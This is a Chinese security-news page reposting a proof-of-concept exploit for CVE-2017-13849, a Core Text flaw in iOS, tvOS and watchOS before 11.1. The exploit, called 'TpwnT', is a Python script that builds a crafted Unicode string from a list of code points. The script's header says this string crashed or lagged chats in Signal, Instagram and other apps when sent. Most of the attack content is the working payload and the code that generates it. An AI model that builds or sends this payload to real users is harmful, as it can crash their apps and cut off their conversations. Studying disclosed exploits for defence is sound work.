首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service
来源:SavSec 作者:Otter 发布时间:2017-11-21  
# Exploit Title: TpwnT - iOS Denail of Service POC
# Date: 10-31-2017
# Exploit Author: Russian Otter (Ro)
# Vendor Homepage: https://support.apple.com/en-us/HT208222
# Version: 2.1
# Tested on: iOS 10.3.2 - 11.1
# CVE: CVE-2017-13849
 
"""
-------------------------
     CVE-2017-13849
  TpwnT by Ro of SavSec
-------------------------
 
Description:
    Thread Pwning Text (TpwnT) is maliciously crafted text that affects the iPhone and other Apple devices by exploiting a vulnerability found in the Core-Text firmware which results in a thread crash or extreme application lag!
 
Recorded Tests / Results:
    Signal version 2.14.1 on iOS 10.3.2 (fixed on 2.15.3) users were able to crash conversations by sending the payload which would result in the app crashing when the selected chat was opened.
    
    Instagram version 10.25 (fixed on 10.31) on iOS 10.3.2 and resulting in chat thread crashes when the payload was sent which disallowed users to load chat or send messages. When the payload was unsent the chat was fuctional.
    
    Pythonista 3 on iOS 10.3.2, crashed when displaying multiple sets of TpwnT or while rotating the device.
    
Summary:
    When displaying the TpwnT Characters on iOS < 11.1 the iPhone may lag intensely or crash on certain apps!
    This allows for the possibility of DoS related attacks or application crashing attacks.
 
Creator: @Russian_Otter (Ro)
Discovery: 7-17-2017
Disclosure: 10-31-2017
Disclosure Page: https://support.apple.com/en-us/HT208222
 
Affected Devices
    iPhone 5S iOS < 11.1
    iPhone 6 & 6S iOS < 11.1
    iPhone 7 iOS < 11.1
    iPhone 8 iOS < 11.1
    iPhone X iOS < 11.1
    Apple TV 4th Generation
    Apple TV 4K 4th Generation
    iPod Touch 6th Generation
    iPad Air
    watchOS < 4.1
    tvOS < 11.1
    iOS < 11.1
 
Tested Devices:
    iPhone 5S iOS 10.3.2 - 11.1
    iPhone 6S iOS 10.3.1 - 11.1
    iPad Mini 2 iOS 10.3.2
    Apple TV 2 tvOS 10
 
Tested Apps:
    Signal
    Instagram
    Snapchat
    Safari
    Tanktastic
    Pythonista 3
    Notepad
 
"""
 
tpwnt = "880 881 883 887 888 975 1159 1275 1276 1277 1278 1302 1304 1305 1306 1311 1313 1314 1316 1317 1318 1319 1322 1323 1324 1325 1326 1327 1328 1543 2304 2405 3073 3559 3585 3586 4091 4183 4184 4353 6366 6798 7679 7680 7837 7930 7932 7933 7934 7935 7936 8343 8344 8345 8346 8347 8348 8349 8376 8381 8382 8383 8384 8524 9136 9169 10215 10216 11153 11374 11377 11381 11390 11392 11746 11747 11748 11749 11750 11751 11752 11753 11754 11755 11756 11757 11758 11759 11760 11761 11762 11763 11764 11765 11766 11767 11768 11769 11771 11772 11773 11774 11775 11776 11811 11813 11814 12295 12344 12357 12686 19971 19975 42560 42562 42563 42564 42565 42566 42567 42568 42569 42570 42571 42572 42573 42574 42575 42576 42577 42578 42579 42580 42581 42583 42584 42585 42587 42588 42589 42590 42591 42592 42594 42595 42596 42597 42598 42599 42600 42601 42602 42603 42604 42605 42606 42608 42609 42610 42611 42612 42613 42614 42615 42616 42617 42619 42620 42621 42622 42623 42624 42625 42627 42628 42629 42630 42632 42633 42634".split()
 
payload = ""
for i in tpwnt:
    s = unichr(int(i))
    payload += s
 
payload = bytes(payload)
payload_unicode = unicode(payload)
 
# Proof of Concept
# iOS < 11.1 Devices that display these characters should experience lag or crashes while TpwnT is visible
 
if raw_input("Show Payload [y/n] ") == "y":
    print payload_unicode
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Microsoft Windows 10 - 'nt!NtQ
·VX Search 10.2.14 - 'Proxy' Bu
·phpMyFAQ 2.9.9 Code Injection
·Microsoft Edge Chakra JIT Bail
·Microsoft Edge Charka JIT Inco
·Microsoft Edge Chakra JIT Type
·Microsoft Edge Object.setProto
·D-Link DIR605L - Denial of Ser
·Dup Scout Enterprise 10.0.18 -
·Wireless IP Camera (P2P) WIFIC
·Ulterius Server < 1.9.5.0 - Di
·PHP 7.1.8 - Heap-Based Buffer
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved